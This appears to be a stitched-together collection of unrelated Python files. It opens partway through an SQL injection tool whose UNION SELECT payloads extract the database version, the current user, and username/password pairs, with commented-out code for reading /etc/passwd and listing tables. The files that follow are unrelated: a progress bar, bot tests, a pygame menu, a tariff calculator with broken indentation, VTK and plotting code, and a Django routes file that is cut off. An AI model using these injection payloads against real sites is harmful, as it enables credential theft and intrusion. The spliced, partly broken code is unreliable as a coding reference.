    print col'''
    print colored('[+] DB version: ','green')
    print "---------------"
    detect_version(url)
    print colored('[+] Current USER: ','green')
    print "---------------"
    detect_user(url)
    '''print colored('[+] Get tables names:','green')
    print "---------------------"
    detect_table_names(url)
    '''
    print colored('[+] Attempting MYSQL user extraction','green')
    print "-------------------------------------"
    steal_users(url)
    '''filename="/etc/passwd"
    message = "\n[+] Reading file: " + filename
    print colored(message,'green')
    print "---------------------------------"
    read_file(url,filename)
    '''
def injector(injected):
    # Request each fuzzed URL and record any whose response body contains a
    # known SQL error marker; returns "url;marker" strings.
    errors = ['Mysql','error in your SQL']
    global results
    results = []
    for y in injected:
        print "[-] Testing errors: " + y
        req=requests.get(y)
        for x in errors:
            if req.content.find(x) != -1:
                res = y + ";" + x
                results.append(res)
    return results
def detect_columns(url):
    # Classic ORDER BY probe: increase the column index until the response
    # contains "Unknown" (unknown column error); the previous index is the
    # column count. Capped at 19 probes.
    new_url= url.replace("FUZZ","admin' order by X-- -")
    y=1
    while y < 20:
        req=requests.get(new_url.replace("X",str(y)))
        if req.content.find("Unknown") == -1:
            y+=1
        else:
            break
    #print "the no of columns are"+str(y-1)
    return str(y-1)
def detect_version(url):
    # UNION-select @@version wrapped in 'TOK' markers and regex it out of
    # the response body.
    new_url= url.replace("FUZZ","\'%20union%20SELECT%201,CONCAT('TOK',@@version,'TOK'),3--%20+")
    req=requests.get(new_url)
    raw = req.content
    reg = ur"TOK([a-zA-Z0-9].+?)TOK+?"
    version=re.findall(reg,req.content)
    for ver in version:
        print ver
    # NOTE(review): returns the last match; raises NameError if no match.
    return ver
def detect_user(url):
    # UNION-select user() wrapped in 'TOK' markers and print every match.
    global users
    new_url= url.replace("FUZZ","\'%20union%20select%201,CONCAT('TOK',user(),'TOK'),3%20from%20users--%20+")
    req=requests.get(new_url)
    raw = req.content
    reg = ur"TOK([a-zA-Z0-9].+?)TOK+?"
    curusers=re.findall(reg,req.content)
    for users in curusers:
        print users
    # NOTE(review): returns the last match; raises NameError if no match.
    return users
def steal_users(url):
    # Dump username/password pairs via UNION SELECT: usernames wrapped in
    # TOK markers, passwords in WOK markers, joined by '::' (0x3a3a).
    global user
    global paswrd
    new_url= url.replace("FUZZ","\'%20union%20select%201,concat(concat('TOK',username,'TOK'),concat(0x3a3a),concat('WOK',password,'WOK')),3%20from%20users--%20+")
    req=requests.get(new_url)
    reg = ur"TOK([\*a-zA-Z0-9].+?)TOK+?"
    reg2 = ur"WOK([\*a-zA-Z0-9].+?)WOK+?"
    users=re.findall(reg,req.content)
    paswd=re.findall(reg2,req.content)
    print "The Usernames are:-"
    for user in users:
        print user
    print "-------------------------------------"
    print "the passwords are:"
    for paswrd in paswd:
        print paswrd
    # NOTE(review): returns only the last user/password pair; raises
    # NameError when nothing was extracted.
    return(user,paswrd)
'''def read_file(url, filename):
new_url= url.replace("FUZZ","""A\'%20union%20SELECT%201,CONCAT('TOK',
LOAD_FILE(\'"+filename+"\'),'TOK')--%20-""")
req=requests.get(new_url)
reg = ur"TOK(.+?)TOK+?"
files= re.findall(reg,req.content)
print req.content
for x in files:
if not x.find('TOK,'):
print x'''
'''def detect_table_names(url):
new_url= url.replace("FUZZ","\'%20union%20SELECT%20CONCAT('TOK',table_schema,'TOK'),CONCAT('TOK',table_name,'TOK')%20FROM%20information_schema.tables%20WHERE%20table_schema%20!=%20%27mysql%27%20AND%20table_schema%20!=%20%27information_schema%27%20and%20table_schema%20!=%20%27performance_schema%27%20--%20-")
req=requests.get(new_url)
raw = req.content
reg = ur"TOK([a-zA-Z0-9].+?)TOK+?"
tables=re.findall(reg,req.content)
for table in tables:
print table
def detect_columns_names(url):
column_names = ['username','user','name','pass','passwd','password','id','role','surname','address']
new_url= url.replace("FUZZ","admin' group by X-- -")
valid_cols = []
for name in column_names:
req=requests.get(new_url.replace("X",name))
if req.content.find("Unknown") == -1:
valid_cols.append(name)
else:
pass
return valid_cols
'''
if __name__ == "__main__":
    try:
        start(sys.argv[1:])
    except KeyboardInterrupt:
        # Graceful message on Ctrl-C instead of a traceback.
        print "SQLinjector interrupted by user..!!"
|
#!/usr/bin/env python2.7
"""A visualisation of playback progress using a bar."""
from progress.bar import Bar
class NullBar(Bar):
    """A no-op progress bar, substituted when running in debug mode."""

    def __init__(self):
        """Deliberately skip Bar's initialisation."""
        pass

    def next(self, n=1):
        """Swallow progress updates without drawing anything."""
        pass
class PlaybackBar(Bar):
    """Progress bar used during playback to represent progress.

    The suffix shows elapsed time, total time and the player's state.
    """

    def __init__(self, *args, **kwargs):
        """Initialise the bar and build the 'elapsed / total / state' suffix."""
        self.player = kwargs['player']
        super(PlaybackBar, self).__init__(*args, **kwargs)
        # self.max is the total length in seconds; render it once as mm:ss.
        total = "%02d:%02d" % (divmod(self.max, 60))
        self.suffix = '%(elapsed)s / {0} / %(state)s'.format(total)

    @property
    def elapsed(self):
        """Elapsed playback time, formatted mm:ss."""
        minutes, seconds = divmod(self.index, 60)
        return "%02d:%02d" % (minutes, seconds)

    @property
    def state(self):
        """Current state string of the wrapped player."""
        return self.player.state
|
import asyncio
from typing import Deque
from unittest.mock import AsyncMock, Mock

import pytest

from .context import ZergBot, Composer
@pytest.mark.asyncio
async def test_updates_multiple_bots():
    """Composer.on_step must prepare and step every bot on a non-first tick."""
    one_bot = ZergBot(Deque([]))
    two_bot = ZergBot(Deque([]))
    bots = [one_bot, two_bot]
    composer = Composer(bots)
    composer.state = Mock()
    for bot in bots:
        bot._prepare_step = Mock(return_value=None)
        # AsyncMock replaces the asyncio.coroutine() wrapper, which was
        # deprecated in 3.8 and removed in Python 3.11.
        bot.on_step = AsyncMock(return_value=None)
        bot._prepare_first_step = Mock(return_value=None)
    iteration = 1
    await composer.on_step(iteration)
    for bot in bots:
        bot._prepare_step.assert_called_once_with(composer.state)
        bot._prepare_first_step.assert_not_called()
        # Bug fix: the original asserted on the loop variable
        # `on_step_stub`, which only referenced the LAST bot's stub —
        # so the last bot was checked twice and the first not at all.
        bot.on_step.assert_called_once_with(iteration)
@pytest.mark.asyncio
async def test_prepare_first_step():
    """On iteration 0 every bot must also receive _prepare_first_step."""
    one_bot = ZergBot(Deque([]))
    two_bot = ZergBot(Deque([]))
    bots = [one_bot, two_bot]
    composer = Composer(bots)
    composer.state = Mock()
    for bot in bots:
        # AsyncMock replaces the asyncio.coroutine() wrapper, which was
        # deprecated in 3.8 and removed in Python 3.11.
        bot.on_step = AsyncMock(return_value=None)
        bot._prepare_step = Mock(return_value=None)
        bot._prepare_first_step = Mock(return_value=None)
    iteration = 0
    await composer.on_step(iteration)
    for bot in bots:
        bot._prepare_step.assert_called_once_with(composer.state)
        bot._prepare_first_step.assert_called_once()
        # Bug fix: assert on each bot's own mock rather than the loop
        # closure `on_step_stub`, which only held the last bot's stub.
        bot.on_step.assert_called_once_with(iteration)
@pytest.mark.asyncio
async def test_prepare_start():
    """on_start must forward client, player id and game info/data to each bot."""
    bots = [ZergBot(Deque([])), ZergBot(Deque([]))]
    composer = Composer(bots)
    composer._client = Mock()
    composer.player_id = 2
    composer._game_info = Mock()
    composer._game_data = Mock()
    for bot in bots:
        bot._prepare_start = Mock(return_value=None)
    composer.on_start()
    for bot in bots:
        bot._prepare_start.assert_called_with(composer._client,
                                              composer.player_id,
                                              composer._game_info,
                                              composer._game_data)
|
import pygame
import pytmx
from pytmx.util_pygame import load_pygame
from com.wwa.main.wwa import Wwa
# Asset paths for the menu screen.
MAP_MENU_BACKGROUND_TMX = "../map/menu_background.tmx"
PIC_MENU_PNG = '../pic/menu.png'
HATICON_PNG = '../pic/haticon.png'
# Initialise all pygame modules at import time.
pygame.init()
class GameMenu():
    """Main-menu screen: animated tiled background plus clickable items.

    Parameters
    ----------
    screen : pygame.Surface
        Display surface to draw on.
    items : iterable of str
        Menu entry labels ('Start', 'About' and 'Quit' are acted upon).
    bg_color : tuple
        Background fill colour (currently only stored).
    font : str or None
        System font name passed to pygame.font.SysFont.
    font_size : int
        Point size of the menu font.
    font_color : tuple
        RGB colour of unselected menu labels.
    """

    def __init__(self, screen, items, bg_color=(0, 0, 0), font=None, font_size=70,
                 font_color=(15, 12, 0)):
        self.screen = screen
        # Off-screen surface holding the pre-rendered 42x42-tile background map.
        self.back_img = pygame.Surface((42 * 32, 42 * 32))
        self.scr_width = self.screen.get_rect().width
        self.scr_height = self.screen.get_rect().height
        self.bg_color = bg_color
        self.clock = pygame.time.Clock()
        self.font = pygame.font.SysFont(font, font_size)
        self.font_color = font_color
        self.menu_image = pygame.image.load(PIC_MENU_PNG)
        self.back_map = load_pygame(MAP_MENU_BACKGROUND_TMX)
        # Pre-render each label and centre the whole column on screen.
        # (The earlier redundant `self.items = items` assignment was removed:
        # it was immediately overwritten by this list.)
        self.items = []
        for index, item in enumerate(items):
            label = self.font.render(item, 1, font_color)
            width = label.get_rect().width
            height = label.get_rect().height
            posx = (self.scr_width / 2) - (width / 2)
            t_h = len(items) * height
            posy = (self.scr_height / 2) - (t_h / 2) + (index * height)
            self.items.append([item, label, (width, height), (posx, posy)])

    def redraw_menu(self, new=None):
        """Blit all labels; the hovered item `new` is re-rendered highlighted."""
        for name, label, (width, height), (posx, posy) in self.items:
            if new is not None and new == name:
                highlight = self.font.render(name, 1, (255, 255, 0))
                self.screen.blit(highlight, (posx, posy + 45))
            else:
                self.screen.blit(label, (posx, posy + 45))

    def run(self):
        """Event loop: animate the background and react to menu clicks."""
        self.redraw_map()
        # Fix: draw on self.screen -- the original used the module-global
        # `screen`, so GameMenu.run() only worked when the file was executed
        # as a script.
        self.screen.blit(self.back_img, (0, 0))
        self.screen.blit(self.menu_image, (190, 100))
        self.redraw_menu()
        pygame.display.update()
        mainloop = True
        xmove = 0
        inc = -1
        while mainloop:
            self.clock.tick(50)  # cap at 50 FPS
            posm = pygame.mouse.get_pos()
            click = pygame.mouse.get_pressed()
            new = None
            for name, label, (width, height), (posx, posy) in self.items:
                # Hit-test the mouse cursor against this label's rectangle.
                if posx < posm[0] < posx + width and posy < posm[1] < posy + height:
                    new = name
                    pygame.display.update()
                    if click[0] and name == 'Quit':
                        mainloop = False
                    if click[0] and name == 'Start':
                        Wwa(1, True, False)
                    if click[0] and name == 'About':
                        print('About - is clicked')
            # Slide the background back and forth between x = 0 and x = -400.
            self.screen.blit(self.back_img, (xmove, 0))
            if xmove <= -400:
                inc = 1
            if xmove > 0:
                inc = -1
            xmove += inc
            self.screen.blit(self.menu_image, (190, 100))
            self.redraw_menu(new)
            pygame.display.update()
            for event in pygame.event.get():
                if event.type == pygame.QUIT:
                    mainloop = False

    def redraw_map(self):
        """Pre-render the tile map onto the off-screen background surface."""
        for layer in self.back_map.visible_layers:
            if isinstance(layer, pytmx.TiledTileLayer):
                # NOTE(review): tiles are always read from layer index 0, so
                # several visible layers would redraw the same content --
                # confirm whether the layer index was meant to vary.
                for x in range(0, 40):
                    for y in range(0, 40):
                        image = self.back_map.get_tile_image(x, y, 0)
                        if image is not None:
                            self.back_img.blit(image, (32 * x, 32 * y))
if __name__ == "__main__":
    # Creating the screen
    screen = pygame.display.set_mode((800, 800), 0, 32)
    icon = pygame.image.load(HATICON_PNG)
    pygame.display.set_icon(icon)
    menu_items = ('Start', 'About', 'Quit')
    pygame.display.set_caption('Wild West Adventure')
    # Khaki background colour, 'JOKERMAN' system font.
    gm = GameMenu(screen, menu_items, (175,159,75),'JOKERMAN')
    gm.run()
|
a=int(input("請輸入一個度數:"))
if a<=120:
print("Summmer months:"+str(2.1*a))
print("Non-Summmer months:"+str(2.1*a))
elif a>=121 and a<=330:
print("Summmer months:"+str(120*2.1+(a-120)*3.02))
print("Non-Summmer months:"+str(120*2.1+(a-120)*2.68))
elif a>=331 and a<=500:
print("Summmer months:"+str(120*2.1+210*3.02+(a-330)*4.39))
print("Non-Summmer months:"+str(120*2.1+210*2.68+(a-330)*3.61))
elif a>=501 and a<=700:
print("Summmer months:"+str(120*2.1+210*3.02+170*4.39+(a-500)*4.97))
print("Non-Summmer months:"+str(120*2.1+210*2.68+170*3.61+(a-500)*4.01))
else:
print("Summmer months:"+str(120*2.1+210*3.02+170*4.39+200*4.97+(a-700)*5.63))
print("Non-Summmer months:"+str(120*2.1+210*2.68+170*3.61+200*4.01+(a-700)*4.5))
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
import sys
import os.path
import math
from PyQt4 import QtCore, QtGui
# Alias the PySide/Qt5-style name: PyQt4 exposes signals as pyqtSignal.
QtCore.Signal = QtCore.pyqtSignal
import vtk
from vtk.qt4.QVTKRenderWindowInteractor import QVTKRenderWindowInteractor
class VTKFrame(QtGui.QFrame):
    """Qt frame embedding a VTK render window.

    Renders a hollow cylinder (outer radius r2, bore radius r1) whose axis
    runs from (x1, y1, z1) to (x2, y2, z2), clipped by planes at both end
    points, together with a blue line marking the axis.
    """

    def __init__(self, parent=None):
        super(VTKFrame, self).__init__(parent)

        self.vtkWidget = QVTKRenderWindowInteractor(self)
        vl = QtGui.QVBoxLayout(self)
        vl.addWidget(self.vtkWidget)
        vl.setContentsMargins(0, 0, 0, 0)

        self.ren = vtk.vtkRenderer()
        self.vtkWidget.GetRenderWindow().AddRenderer(self.ren)
        self.iren = self.vtkWidget.GetRenderWindow().GetInteractor()

        # Construct a cylinder from (x1, y1, z1) to (x2, y2, z2) with inner
        # and outer radii r1, r2.
        x1, y1, z1 = 10, 2, 3
        x2, y2, z2 = 10, 20, 30
        r1, r2 = 3, 8
        dx, dy, dz = x2 - x1, y2 - y1, z2 - z1

        # Axis line (fix: the vtkLineSource was constructed twice; the first
        # instance was immediately discarded).
        axisSource = vtk.vtkLineSource()
        axisSource.SetPoint1(x1, y1, z1)
        axisSource.SetPoint2(x2, y2, z2)
        axisMapper = vtk.vtkPolyDataMapper()
        axisMapper.SetInputConnection(axisSource.GetOutputPort())
        axisActor = vtk.vtkActor()
        axisActor.GetProperty().SetColor(0, 0, 1)
        axisActor.SetMapper(axisMapper)
        self.ren.AddActor(axisActor)

        # Clipping planes at both cylinder ends, normals pointing outwards
        # from the cylinder body.
        plane1 = vtk.vtkPlane()
        plane1.SetOrigin(x1, y1, z1)
        plane1.SetNormal(-dx, -dy, -dz)
        plane2 = vtk.vtkPlane()
        plane2.SetOrigin(x2, y2, z2)
        plane2.SetNormal(dx, dy, dz)

        # Infinite implicit cylinders for the outer wall and the bore.
        out_cylinder = vtk.vtkCylinder()
        out_cylinder.SetCenter(0, 0, 0)
        out_cylinder.SetRadius(r2)
        in_cylinder = vtk.vtkCylinder()
        in_cylinder.SetCenter(0, 0, 0)
        in_cylinder.SetRadius(r1)

        # vtkCylinder's axis is the y-axis; rotate/translate it onto the
        # requested axis (x2-x1, y2-y1, z2-z1).
        angle = math.acos(dy / math.sqrt(dx ** 2 + dy ** 2 + dz ** 2)) * 180.0 / math.pi
        transform = vtk.vtkTransform()
        transform.RotateWXYZ(-angle, dz, 1, -dx)
        transform.Translate(-x1, -y1, -z1)
        out_cylinder.SetTransform(transform)
        in_cylinder.SetTransform(transform)

        # Outer cylinder intersected with both half-spaces ...
        cuted = vtk.vtkImplicitBoolean()
        cuted.SetOperationTypeToIntersection()
        cuted.AddFunction(out_cylinder)
        cuted.AddFunction(plane1)
        cuted.AddFunction(plane2)
        # ... minus the bore -> hollow tube.
        cuted2 = vtk.vtkImplicitBoolean()
        cuted2.SetOperationTypeToDifference()
        cuted2.AddFunction(cuted)
        cuted2.AddFunction(in_cylinder)

        # Sample the implicit function on a regular grid.
        sample = vtk.vtkSampleFunction()
        sample.SetImplicitFunction(cuted2)
        sample.SetModelBounds(-100, 100, -100, 100, -100, 100)
        sample.SetSampleDimensions(300, 300, 300)
        sample.SetComputeNormals(0)

        # Extract the zero iso-surface from the samples.
        surface = vtk.vtkContourFilter()
        surface.SetInputConnection(sample.GetOutputPort())

        mapper = vtk.vtkPolyDataMapper()
        mapper.SetInputConnection(surface.GetOutputPort())
        actor = vtk.vtkActor()
        actor.SetMapper(mapper)

        self.ren.AddActor(actor)
        self.ren.ResetCamera()

        self._initialized = False

    def showEvent(self, evt):
        # Initialise the interactor only once, on first show.
        if not self._initialized:
            self.iren.Initialize()
            self._initialized = True
class MainPage(QtGui.QMainWindow):
    """Top-level window that hosts the VTK demo frame."""

    def __init__(self, parent=None):
        super(MainPage, self).__init__(parent)
        self.setCentralWidget(VTKFrame())
        self.setWindowTitle("Implicitfunction Example")

    def categories(self):
        """Demo-browser categories this example belongs to."""
        return ['Demo', 'Implicit Function', 'Filters']

    def mainClasses(self):
        """VTK classes demonstrated by this example."""
        return ['vtkCylinder', 'vtkPlane', 'vtkImplicitBoolean',
                'vtkSampleFunction', 'vtkContourFilter']
if __name__ == '__main__':
    # Run the demo as a standalone Qt application.
    app = QtGui.QApplication(sys.argv)
    w = MainPage()
    w.show()
    sys.exit(app.exec_())
|
# -*- coding: utf-8 -*-
# Author: Christian Brodbeck <christianbrodbeck@nyu.edu>
"""Color tools for plotting."""
from __future__ import division
from itertools import izip, product
import operator
import numpy as np
import matplotlib as mpl
from .. import _colorspaces as cs
from .._data_obj import cellname, isfactor, isinteraction
from ._base import _EelFigure
def find_cell_colors(x, colors):
    """Resolve the ``colors`` argument of plotting functions to a dict.

    Parameters
    ----------
    x : categorial
        Model for which colors are needed.
    colors : str | list | dict
        **str**: a colormap name, sampled at regular intervals.
        **list**: one color per cell, in cell order.
        **dict**: explicit cell -> color mapping.

        Colors are specified as `matplotlib compatible color arguments
        <http://matplotlib.org/api/colors_api.html>`_.
    """
    if isinstance(colors, dict):
        # every cell must be present in an explicit mapping
        for cell in x.cells:
            if cell not in colors:
                raise KeyError("%s not in colors" % repr(cell))
        return colors
    if isinstance(colors, (list, tuple)):
        cells = x.cells
        if len(colors) < len(cells):
            err = ("The `colors` argument %s does not supply enough "
                   "colors (%i) for %i "
                   "cells." % (str(colors), len(colors), len(cells)))
            raise ValueError(err)
        return dict(zip(cells, colors))
    if colors is None or isinstance(colors, basestring):
        return colors_for_categorial(x, colors)
    raise TypeError("Invalid type: colors=%s" % repr(colors))
def colors_for_categorial(x, cmap=None):
    """Automatically pick cell colors for a categorial model.

    Parameters
    ----------
    x : categorial
        Model defining the cells for which to define colors.
    cmap : None | str
        Matplotlib colormap name (optional).

    Returns
    -------
    colors : dict {cell -> color}
        Dictionary providing colors for the cells in x.
    """
    if isfactor(x):
        return colors_for_oneway(x.cells, cmap)
    if isinteraction(x):
        return colors_for_nway([f.cells for f in x.base], cmap)
    raise TypeError("x needs to be Factor or Interaction, got %s" % repr(x))
def colors_for_oneway(cells, cmap='jet'):
    """Assign a color to every cell of a single-factor design.

    Parameters
    ----------
    cells : sequence of str
        Cells for which to assign colors.
    cmap : str
        Matplotlib colormap name; None is treated as 'jet'.

    Returns
    -------
    dict : {str: tuple}
        Mapping from cells to colors.
    """
    cm = mpl.cm.get_cmap('jet' if cmap is None else cmap)
    n = len(cells)
    # sample the map at i/n (true division via __future__ import)
    return {cell: cm(i / n) for i, cell in enumerate(cells)}
def colors_for_twoway(x1_cells, x2_cells, cmap=None):
    """Assign a color to every cell of a two-way design.

    Parameters
    ----------
    x1_cells : tuple of str
        Cells of the major factor.
    x2_cells : tuple of str
        Cells of the minor factor.
    cmap : str
        Name of a matplotlib colormap to use (the default picks a colormap
        based on the number of cells in the primary factor).

    Returns
    -------
    dict : {tuple: tuple}
        Mapping from cells to colors.
    """
    n1, n2 = len(x1_cells), len(x2_cells)
    if n1 < 2 or n2 < 2:
        raise ValueError("Need at least 2 cells on each factor")
    cm = cs.twoway_cmap(n1) if cmap is None else mpl.cm.get_cmap(cmap)
    # evenly spaced sample points in [0, (n-1)/n]
    n_colors = n1 * n2
    samples = np.linspace(0, (n_colors - 1) / n_colors, n_colors)
    return dict(izip(product(x1_cells, x2_cells), map(tuple, cm(samples))))
def colors_for_nway(cell_lists, cmap=None):
    """Define cell colors for an n-way design

    Parameters
    ----------
    cell_lists : sequence of tuple of str
        List of the cells for each factor. E.g. for ``A % B``:
        ``[('a1', 'a2'), ('b1', 'b2', 'b3')]``.
    cmap : str
        Name of a matplotlib colormap to use (Default picks depending on number
        of cells in primary factor).

    Returns
    -------
    dict : {tuple: tuple}
        Mapping from cells to colors.
    """
    # under Python 2 map() returns a list, so ns[0] is valid
    ns = map(len, cell_lists)
    if cmap is None:
        cm = cs.twoway_cmap(ns[0])
    else:
        cm = mpl.cm.get_cmap(cmap)
    # find locations in the color-space to sample: one color per cell
    # combination, centered in equal-width bins of [0, 1]
    n_colors = reduce(operator.mul, ns)
    edge = 0.5 / n_colors
    samples = np.linspace(edge, 1 - edge, n_colors)
    colors = {cell: tuple(color) for cell, color in
              izip(product(*cell_lists), cm(samples))}
    return colors
class ColorGrid(_EelFigure):
    """Plot colors for a two-way design in a grid

    Parameters
    ----------
    row_cells : tuple of str
        Cells contained in the rows.
    column_cells : tuple of str
        Cells contained in the columns.
    colors : dict
        Colors for cells.
    size : scalar
        Size (width and height) of the color squares (the default is to
        scale them to fit the figure).
    column_label_position : 'top' | 'bottom'
        Where to place the column labels (default is 'top').
    row_first : bool
        Whether the row cell precedes the column cell in color keys. By
        default this is inferred from the existing keys.
    """
    def __init__(self, row_cells, column_cells, colors, size=None,
                 column_label_position='top', row_first=None, *args, **kwargs):
        # Infer key order -- (row, col) vs (col, row) -- from the colors dict.
        if row_first is None:
            row_cell_0 = row_cells[0]
            col_cell_0 = column_cells[0]
            if (row_cell_0, col_cell_0) in colors:
                row_first = True
            elif (col_cell_0, row_cell_0) in colors:
                row_first = False
            else:
                msg = ("Neither %s nor %s exist as a key in colors" %
                       ((row_cell_0, col_cell_0), (col_cell_0, row_cell_0)))
                raise KeyError(msg)

        # Without an explicit square size, let _tight() scale the axes.
        tight = size is None
        _EelFigure.__init__(self, "ColorGrid", None, 3, 1, tight, *args, **kwargs)
        ax = self.figure.add_axes((0, 0, 1, 1), frameon=False)
        ax.set_axis_off()
        self._ax = ax

        # reverse rows so we can plot upwards
        row_cells = tuple(reversed(row_cells))
        n_rows = len(row_cells)
        n_cols = len(column_cells)

        # color patches: one unit square per cell
        for col in xrange(n_cols):
            for row in xrange(n_rows):
                if row_first:
                    cell = (row_cells[row], column_cells[col])
                else:
                    cell = (column_cells[col], row_cells[row])
                patch = mpl.patches.Rectangle((col, row), 1, 1, fc=colors[cell],
                                              ec='none')
                ax.add_patch(patch)

        # column labels; ymin/ymax are only needed -- and only computable --
        # when an explicit size is given.  (Fix: the original divided by
        # `size` unconditionally, raising TypeError for the default
        # size=None.)
        self._labels = []
        ymin = ymax = None
        if column_label_position == 'top':
            y = n_rows + 0.1
            va = 'bottom'
            rotation = 40
            if size is not None:
                ymin = 0
                ymax = self._layout.h / size
        elif column_label_position == 'bottom':
            y = -0.1
            va = 'top'
            rotation = -40
            if size is not None:
                ymax = n_rows
                ymin = n_rows - self._layout.h / size
        else:
            msg = "column_label_position=%s" % repr(column_label_position)
            raise ValueError(msg)

        for col in xrange(n_cols):
            label = column_cells[col]
            h = ax.text(col + 0.5, y, label, va=va, ha='left', rotation=rotation)
            self._labels.append(h)

        # row labels, to the right of the grid
        x = n_cols + 0.1
        for row in xrange(n_rows):
            label = row_cells[row]
            h = ax.text(x, row + 0.5, label, va='center', ha='left')
            self._labels.append(h)

        if size is not None:
            self._ax.set_xlim(0, self._layout.w / size)
            self._ax.set_ylim(ymin, ymax)

        self._show()

    def _tight(self):
        # arbitrary default with equal aspect
        self._ax.set_ylim(0, 1)
        self._ax.set_xlim(0, 1 * self._layout.w / self._layout.h)

        # draw to compute text coordinates
        self.draw()

        # find the label bounding box (display coordinates)
        xmax = 0
        ymax = 0
        for h in self._labels:
            bbox = h.get_window_extent()
            if bbox.xmax > xmax:
                xmax = bbox.xmax
                xpos = h.get_position()[0]
            if bbox.ymax > ymax:
                ymax = bbox.ymax
                ypos = h.get_position()[1]
        xmax += 2
        ymax += 2

        # transform from display coordinates -> data coordinates
        trans = self._ax.transData.inverted()
        xmax, ymax = trans.transform((xmax, ymax))

        # calculate required movement
        _, ax_xmax = self._ax.get_xlim()
        _, ax_ymax = self._ax.get_ylim()
        xtrans = ax_xmax - xmax
        ytrans = ax_ymax - ymax

        # calculate the scale factor:
        # new_coord = x * coord
        # new_coord = coord + trans
        # x = (coord + trans) / coord
        scale = (xpos + xtrans) / xpos
        scale_y = (ypos + ytrans) / ypos
        if scale_y <= scale:
            scale = scale_y
        self._ax.set_xlim(0, ax_xmax / scale)
        self._ax.set_ylim(0, ax_ymax / scale)
class ColorList(_EelFigure):
    """Plot colors with labels

    Parameters
    ----------
    colors : dict
        Colors for cells.
    cells : tuple
        Cells for which to plot colors (default is ``colors.keys()``).
    labels : dict (optional)
        Condition labels that are used instead of the keys in ``colors``. This
        is useful if ``colors`` uses abbreviated labels, but the color legend
        should contain more intelligible labels.
    h : 'auto' | scalar
        Height of the figure in inches. If 'auto' (default), the height is
        automatically increased to fit all labels.
    """
    def __init__(self, colors, cells=None, labels=None, h='auto', *args,
                 **kwargs):
        # only forward an explicit numeric height; 'auto' is resolved below
        # by resizing the frame after the labels are drawn
        if h != 'auto':
            kwargs['h'] = h
        if cells is None:
            cells = colors.keys()
        if labels is None:
            labels = {cell: cellname(cell) for cell in cells}
        elif not isinstance(labels, dict):
            raise TypeError("labels=%s" % repr(labels))
        _EelFigure.__init__(self, "Colors", None, 2, 1.5, False, None, *args,
                            **kwargs)
        ax = self.figure.add_axes((0, 0, 1, 1), frameon=False)
        ax.set_axis_off()
        n = len(cells)
        text_h = []
        for i, cell in enumerate(cells):
            # draw from the top down: the first cell ends up in the top row
            bottom = n - i - 1
            y = bottom + 0.5
            patch = mpl.patches.Rectangle((0, bottom), 1, 1, fc=colors[cell],
                                          ec='none', zorder=1)
            ax.add_patch(patch)
            text_h.append(ax.text(1.1, y, labels[cell], va='center', ha='left', zorder=2))
        ax.set_ylim(0, n)
        ax.set_xlim(0, n * self._layout.w / self._layout.h)
        # resize the figure to fit the content
        if h == 'auto':
            # NOTE(review): self._frame looks backend-specific (wx-style
            # GetSize/SetSize) -- confirm before using with other backends
            width, old_height = self._frame.GetSize()
            self.draw()
            text_height = max(h.get_window_extent().height for h in text_h) * 1.2
            new_height = text_height * n
            if new_height > old_height:
                self._frame.SetSize((width, new_height))
        self._show()
class ColorBar(_EelFigure):
    u"""A color-bar for a matplotlib color-map

    Parameters
    ----------
    cmap : str | Colormap
        Name of the color-map, or a matplotlib Colormap.
    vmin : scalar
        Lower end of the scale mapped onto cmap.
    vmax : scalar
        Upper end of the scale mapped onto cmap.
    label : None | str
        Label for the x-axis (default is the unit, or if no unit is provided
        the name of the colormap).
    label_position : 'left' | 'right' | 'top' | 'bottom'
        Position of the axis label. Valid values depend on orientation.
    label_rotation : scalar
        Angle of the label in degrees (For horizontal colorbars, the default is
        0; for vertical colorbars, the default is 0 for labels of 3 characters
        and shorter, and 90 for longer labels).
    clipmin : scalar
        Clip the color-bar below this value.
    clipmax : scalar
        Clip the color-bar above this value.
    orientation : 'horizontal' | 'vertical'
        Orientation of the bar (default is horizontal).
    unit : str
        Unit for the axis to determine tick labels (for example, ``u'µV'`` to
        label 0.000001 as '1').
    contours : iterator of scalar (optional)
        Plot contour lines at these values.
    """
    def __init__(self, cmap, vmin, vmax, label=True, label_position=None,
                 label_rotation=None,
                 clipmin=None, clipmax=None, orientation='horizontal',
                 unit=None, contours=(), *args, **kwargs):
        cm = mpl.cm.get_cmap(cmap)
        # render the colormap's lookup table as an image strip, one pixel
        # wide in the cross direction
        lut = cm(np.arange(cm.N))
        if orientation == 'horizontal':
            h = 1
            ax_aspect = 4
            im = lut.reshape((1, cm.N, 4))
        elif orientation == 'vertical':
            h = 4
            ax_aspect = 0.3
            im = lut.reshape((cm.N, 1, 4))
        else:
            raise ValueError("orientation=%s" % repr(orientation))

        if label is True:
            # default label: the unit if given, otherwise the colormap name
            if unit:
                label = unit
            else:
                label = cm.name
        title = "ColorBar: %s" % cm.name
        _EelFigure.__init__(self, title, 1, h, ax_aspect, *args, **kwargs)
        ax = self._axes[0]
        if orientation == 'horizontal':
            ax.imshow(im, extent=(vmin, vmax, 0, 1), aspect='auto')
            ax.set_xlim(clipmin, clipmax)
            ax.yaxis.set_ticks(())
            self._contours = [ax.axvline(c, c='k') for c in contours]
            if unit:
                self._configure_xaxis(unit, label)
            elif label:
                ax.set_xlabel(label)
            if label_position is not None:
                ax.xaxis.set_label_position(label_position)
            if label_rotation is not None:
                ax.xaxis.label.set_rotation(label_rotation)
        elif orientation == 'vertical':
            ax.imshow(im, extent=(0, 1, vmin, vmax), aspect='auto', origin='lower')
            ax.set_ylim(clipmin, clipmax)
            ax.xaxis.set_ticks(())
            self._contours = [ax.axhline(c, c='k') for c in contours]
            if unit:
                self._configure_yaxis(unit, label)
            elif label:
                ax.set_ylabel(label)
            if label_position is not None:
                ax.yaxis.set_label_position(label_position)
            if label_rotation is not None:
                ax.yaxis.label.set_rotation(label_rotation)
                # keep near-horizontal rotated labels vertically centered
                if (label_rotation + 10) % 360 < 20:
                    ax.yaxis.label.set_va('center')
            elif label and len(label) <= 3:
                # short labels read fine horizontally
                ax.yaxis.label.set_rotation(0)
                ax.yaxis.label.set_va('center')
        else:
            raise ValueError("orientation=%s" % repr(orientation))
        self._show()
|
from django.urls import path
from salvados.views import ListarSalvados, InsertarSalvado, EditarSalvado, BorrarSalvado
# CRUD routes for the Salvado class-based views.
urlpatterns=[
    path('salvados', ListarSalvados.as_view(), name='salvados_list'),
    path('salvados/new', InsertarSalvado.as_view(), name='insertar_salvado'),
    # NOTE(review): 'edit<int:pk>' / 'delete<int:pk>' have no separator before
    # the pk (URLs look like 'salvados/edit3') -- confirm this is intended.
